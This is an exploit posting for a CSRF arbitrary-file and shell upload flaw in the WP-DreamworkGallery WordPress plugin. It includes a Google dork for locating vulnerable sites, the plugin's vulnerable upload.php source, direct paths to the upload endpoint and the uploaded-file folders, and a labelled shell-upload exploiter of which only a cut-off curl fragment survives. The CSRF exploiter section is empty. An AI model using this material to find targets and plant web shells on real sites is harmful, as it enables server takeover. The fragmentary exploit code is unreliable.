############################################################################## # Exploit Title : WordPress WP-DreamworkGallery Plugins 2.3 CSRF Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 05/03/2019 # Vendor Homepage : wordpress.org ~ wpslideshow.com # Software Download Link : downloads.wordpress.org/plugin/wp-dreamworkgallery.zip # Software Information Link : wordpress.org/plugins/wp-dreamworkgallery/ # Software Version : 2.1 and 2.3 and other previous versions may vulnerable Compatible with WordPress 2.5 and 3.0 - or higher version # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : filetype:xml inurl:/wp-content/plugins/wp-dreamworkgallery # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ] CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ############################################################################## # Description about Software : *************************** wp Dreamwork Gallery is open source software for WordPress. ############################################################################## # Impact : *********** * The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. * WordPress WP-DreamworkGallery Plugins 2.3-2.1 and other versions is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress Plugin wp Dreamwork Gallery version 2.1 and 2.3 is vulnerable; prior versions may also be affected. ############################################################################## Vulnerable Source Code : [ upload.php ] ************************************* txt; mysql_free_result($secw_res); // if (!isset($_POST['secw']) || trim($_POST['secw']) == "" || $sec_word_site != $_POST['secw']) { HandleError("Security word error."); exit(0); } // Check post_max_size (http://us3.php.net/manual/en/features.file-upload.php#73762) $POST_MAX_SIZE = ini_get('post_max_size'); $unit = strtoupper(substr($POST_MAX_SIZE, -1)); $multiplier = ($unit == 'M' ? 1048576 : ($unit == 'K' ? 1024 : ($unit == 'G' ? 1073741824 : 1))); if ((int)$_SERVER['CONTENT_LENGTH'] > $multiplier*(int)$POST_MAX_SIZE && $POST_MAX_SIZE) { header("HTTP/1.1 500 Internal Server Error"); // This will trigger an uploadError event in SWFUpload echo "POST exceeded maximum allowed size."; exit(0); } // Settings //$save_path = getcwd() . "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment) $save_path = $_REQUEST['folder'] . '/'; $upload_name = "Filedata"; $max_file_size_in_bytes = 2147483647; // 2GB in bytes $extension_whitelist = array("jpg", "gif", "png"); // Allowed file extensions $valid_chars_regex = '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) // Other variables $MAX_FILENAME_LENGTH = 260; $file_name = ""; $file_extension = ""; $uploadErrors = array( 0=>"There is no error, the file uploaded with success", 1=>"The uploaded file exceeds the upload_max_filesize directive in php.ini", 2=>"The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form", 3=>"The uploaded file was only partially uploaded", 4=>"No file was uploaded", 6=>"Missing a temporary folder" ); // Validate the upload if (!isset($_FILES[$upload_name])) { HandleError("No upload found in \$_FILES for " . $upload_name); exit(0); } else if (isset($_FILES[$upload_name]["error"]) && $_FILES[$upload_name]["error"] != 0) { HandleError($uploadErrors[$_FILES[$upload_name]["error"]]); exit(0); } else if (!isset($_FILES[$upload_name]["tmp_name"]) || !@is_uploaded_file($_FILES[$upload_name]["tmp_name"])) { HandleError("Upload failed is_uploaded_file test."); exit(0); } else if (!isset($_FILES[$upload_name]['name'])) { HandleError("File has no name."); exit(0); } // Validate the file size (Warning: the largest files supported by this code is 2GB) $file_size = @filesize($_FILES[$upload_name]["tmp_name"]); if (!$file_size || $file_size > $max_file_size_in_bytes) { HandleError("File exceeds the maximum allowed size"); exit(0); } if ($file_size <= 0) { HandleError("File size outside allowed lower bound"); exit(0); } // Validate file name (for our purposes we'll just remove invalid characters) $file_name = preg_replace('/[^'.$valid_chars_regex.']|\.+$/i', "", basename($_FILES[$upload_name]['name'])); if (strlen($file_name) == 0 || strlen($file_name) > $MAX_FILENAME_LENGTH) { HandleError("Invalid file name"); exit(0); } // Validate that we won't over-write an existing file if (file_exists($save_path . $file_name)) { HandleError("File with this name already exists"); exit(0); } // Validate file extension $path_info = pathinfo($_FILES[$upload_name]['name']); $file_extension = $path_info["extension"]; $is_valid_extension = false; foreach ($extension_whitelist as $extension) { if (strcasecmp($file_extension, $extension) == 0) { $is_valid_extension = true; break; } } if (!$is_valid_extension) { HandleError("Invalid file extension"); exit(0); } // Validate file contents (extension and mime-type can't be trusted) /* Validating the file contents is OS and web server configuration dependant. Also, it may not be reliable. See the comments on this page: http://us2.php.net/fileinfo Also see http://72.14.253.104/search?q=cache:3YGZfcnKDrYJ:www.scanit.be/uploads/php-file-upload.pdf+php+file+command&hl=en&ct=clnk&cd=8&gl=us&client=firefox-a which describes how a PHP script can be embedded within a GIF image file. Therefore, no sample code will be provided here. Research the issue, decide how much security is needed, and implement a solution that meets the needs. */ // Process the file /* At this point we are ready to process the valid file. This sample code shows how to save the file. Other tasks could be done such as creating an entry in a database or generating a thumbnail. Depending on your server OS and needs you may need to set the Security Permissions on the file after it has been saved. */ $tmp_filename = md5(rand() . 'a' . rand() . 'b' . time() . 'c' . rand()); if (!@move_uploaded_file($_FILES[$upload_name]["tmp_name"], $save_path.$tmp_filename)) { HandleError("File could not be saved."); exit(0); } else { // check image file $allow_mime = array ('image/gif', 'image/jpeg', 'image/png'); $sz_info = getimagesize($save_path.$tmp_filename); if (empty($sz_info) || !isset($sz_info[0]) || !is_numeric($sz_info[0]) || !isset($sz_info[1]) || !is_numeric($sz_info[1]) || !isset($sz_info['mime']) || !in_array($sz_info['mime'], $allow_mime)) { unlink($save_path.$tmp_filename); HandleError("Invalid file type"); exit(0); } else { rename ($save_path.$tmp_filename, $save_path.$file_name); } } exit(0); /* Handles the error output. This error message will be sent to the uploadSuccess event handler. The event handler will have to check for any error messages and react as needed. */ function HandleError($message) { echo $message; } ?> ############################################################################## # PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter : **************************************************************** "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ############################################################################## First Exploit Direct Access : ************************* /wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/upload.php Directory File Path : ****************** /wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/....... Vulnerability Error on Page : ************************* No upload found in $_FILES for Filedata - Security word error. Second Exploit Direct Access : *************************** /wp-admin/admin.php?page=dreamwork_manage Directory File Path : ******************* /wp-content/uploads/dreamwork/1_uploadfolder/big/......... /wp-content/uploads/dreamwork/[ID-NUMBER]_uploadfolder/big/...... ############################################################################## Cross Site Request Forgery CSRF Exploiter => ******************************************
############################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################################